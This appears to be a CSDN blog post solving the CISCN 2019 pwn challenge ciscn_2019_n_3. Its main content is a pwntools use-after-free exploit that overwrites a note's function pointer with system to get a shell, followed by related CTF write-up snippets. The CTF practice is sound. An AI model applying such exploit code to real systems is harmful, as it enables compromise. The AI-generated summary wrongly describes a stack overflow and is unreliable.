ciscn2019 pwn3

最新推荐文章于 2024-12-01 21:11:45 发布
最新推荐文章于 2024-12-01 21:11:45 发布
阅读量458 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pondzhang/article/details/106346985
本文详细介绍了CISCN2019网络安全竞赛中pwn3挑战的漏洞利用过程,包括漏洞类型、exploit编写思路以及解决难点的技巧。通过对内存错误、栈溢出和返回地址篡改的深入分析,揭示了攻击者如何通过缓冲区溢出获取代码执行权限,进而实现远程控制系统。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

from pwn import *

p = process("./ciscn_2019_n_3")
elf = ELF('./ciscn_2019_n_3')

def do_new_text(idx, lens, content):
    p.sendlineafter("CNote > ", '1')
    p.sendlineafter("Index > ", str(idx))
    p.sendlineafter("Type > ", '2')
    p.sendlineafter("Length > ", str(lens))
    p.sendlineafter("Value > ", content)


def do_new_int(idx, content):
    p.sendlineafter("CNote > ", '1')
    p.sendlineafter("Index > ", str(idx))
    p.sendlineafter("Type > ", '1')
    p.sendlineafter("Value > ", str(content))


def do_dump(idx):
    p.sendlineafter("CNote > ", '3')
    p.sendlineafter("Index > ", str(idx))


def do_dele(idx):
    p.sendlineafter("CNote > ", '2')
    p.sendlineafter("Index > ", str(idx))

do_new_text(0, 0x18, 'aaaa')
do_new_text(1, 0x18, 'bbbb')
do_dele(0)
do_dele(1)
do_new_text(2,0xc,'sh\x00\x00'+p32(elf.plt['system']))
do_dele(0)
p.interactive()
[网络安全自学篇] 二十一.GeekPwn 2019极客大赛之安全攻防技术总结及ShowTime
杨秀璋的专栏
11-04 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。这篇文章主要分享作者10月24日参加上海GeekPwn极客大赛的体会,包括各种安全技术、ShowTime及疑惑。作者尽量还原当时的现场情景,以观众第一视角,带着网络安全初学者的无数疑问,并查询资料分享一些技术点。写这篇文章不容易,花费了两部手机电量,许多笔记、照片和资料完成,希望您喜欢,不喜勿喷~
Pwn2Own Austin 2021 Cisco RV34x RCE 漏洞链复现
2023年最新地推相关信息
03-07 289
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 472
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
pwnciscn_2019_s_4
Nothing
03-06 854
main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,得到栈上buf地址,迁移到buf即可。 from pwn import * io=remote('node3.buuoj.cn',28060) leave=0x8048562 sys_plt=0x8048400 pl1='a'*0x24+'bbbb' io.send(pl1) io.recvuntil('bbbb') ebp=u32(...
pwnciscn_2019_final_3
Nothing
12-18 1755
例行检查 保护全开,分析程序。 add函数 只能申请小于0x78大小的chunk,chunk数量不能超过24个,且题目给了申请到内存空间的地址。 free函数 free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,fre...
Zero Nights 2019 (Russia)PPT汇总(15份).zip
01-03
['Advanced Binary Emulation framework.pdf', 'CiscoASA:From Zero to ID=0.pdf', 'crauEmu - your IDE for code-reuse attacks.pdf', 'Dark sides of Java remote protocols.pdf', 'Electron,scheme handlers ...
2019俄罗斯Zero Nights会议PPT精华汇总
标题“Zero Nights 2019 (Russia)PPT汇总(15份).zip”揭示了文件为俄罗斯一场信息安全会议“Zero Nights 2019”的PPT汇总。该会议可能聚焦于网络安全领域的最新发现、技术分享与攻防策略。汇总了15个PPT文件,这些...
cisco 无线局域网实验
最新发布
01-10
### Cisco 无线局域网配置与操作教程 #### 1. 准备工作 确保已安装并启动 Cisco Packet Tracer 软件。创建新项目,添加所需设备,包括至少一台无线路由器、若干台 PC 或笔记本电脑作为无线客户端。 #### 2. 基础...
[BUUCTF]PWN——ciscn_2019_final_2
mcmuyanga的博客
03-10 1283
ciscn_2019_final_2 附件 步骤 例行检查,64位程序,保护全开 本地没有flag文件,远程连接一下,经典的堆题的菜单 64位ida载入 init() allocate(),只可以申请0x20或者0x10的chunk delete() show(),show只能调用3次 bye_bye 这道题的关键点在于文件流的知识 dup2 用来复制文件描述符:int dup2 (int oldfd,int newfd) _fileno 是用来规定 fd 所指向的文件流的,i
2019CISCN华南赛区半决赛 pwn
qq_41071646的博客
12-09 965
好久没有练过pwn了,, 感觉自己pwn 都废了,, 近期打算刷一下攻防世界的android 然后 刷刷这个华南赛区的pwn。 如果刷的差不多 打算继续刷buuoj 。暂时把自己会的刷完。。 pwn1 这个题目真的很有意思 感觉出题人费心了 edit 函数已经给限制了 然后show 函数也限制了 edit 函数????️一个 off by null 由于没有开pie un...
PWN2019-ciscn your——pwn
Joaus的博客
05-05 928
这题的漏洞点就在数组下标越界,造成栈上任意地址读写。 在做的时候遇到的坑点: 1.在于数组类型转换输出会造成误导: 2.对不给libc.so的题可以用libcsearch和onegadget配合得到onegadget地址,因为我直接调用system函数会出现段错误,应该是在对栈上数据进行操作覆盖了环境变量???但是用onegadget就成功getshelll。 from LibcSearcher...
[BUUCTF]PWN——ciscn_2019_s_9
BangSen1的博客
04-26 629
ciscn_2019_s_9 参考 例行检查 ,32位,未开启任何保护 运行一下。 32位ida载入,,第10行的fgets,能够溢出0x32-0x20-0x4个字节 没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode 生成的shellcode的长度过长,参数 s0x20(32) 写不下。 shellcode =''' xor eax,eax #eax置0 xor edx,edx #edx置0 push edx #将0入栈,标
pwnciscn_2019_s_3
Nothing
12-14 4779
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
【逆向学习记录】Tcachebin CISCN_2019_PWN17 Write up
卦星的专栏
09-01 1077
1 概述 这几天做了一个libc2.27的题目,了解到tcachebin的基础内容,发现利用这个tcachebin,反而导致漏洞更好利用了 2 tchchebin 3 CTF题目 题目1:CISCN2019_pwn6 参考:pwn6_exp 题目2:CISCN2019_pwn17 4 解题思路 4.1 题目解析 1,输入内容,基本上没有任何内容提示 2、反编译查看 1、存在一个check,绕过这...
pwnciscn_2019_es_2
Nothing
12-24 2896
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
BUUCTF Pwn ciscn_2019_c_1 题解
qq_33348179的博客
12-01 408
2.接下来找libc的版本 利用 libc地址 = 真实地址 - 偏移地址 得到system和binsh的地址。其中,用两次recvline()的原因是隔离掉 \n 和 ciphertext。puts_address的那一大串是用于接收地址 去掉结尾的\0 并且将长度补到。SHIFT+F12查看字符串 可以看到没有后门函数 这是一道ret2libc题。同时因为这是64位程序,函数参数用寄存器存储且第一个是 RDI寄存器。1.首先,构造payload1,得到puts的真实地址。ret用于64位栈平衡。
[BUUCTF]PWN——ciscn_2019_n_3
mcmuyanga的博客
01-06 1131
ciscn_2019_n_3 附件 步骤 例行检查,32位,开启了nx和canary保护 本地试运行一下,经典的堆题的菜单 3.32位ida载入 new(),申请了两个chunk,第一个chunk(13行)固定大小0xC,存放的是rec_int_print和rec_int_free函数的地址,第二个chunk(32行),是我们申请的chunk del() 如果值是整数,直接 free chunk 如果值是字符串,则 chunk 和存储字符串的 chunk 都要 free。注意这里只是进行了
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值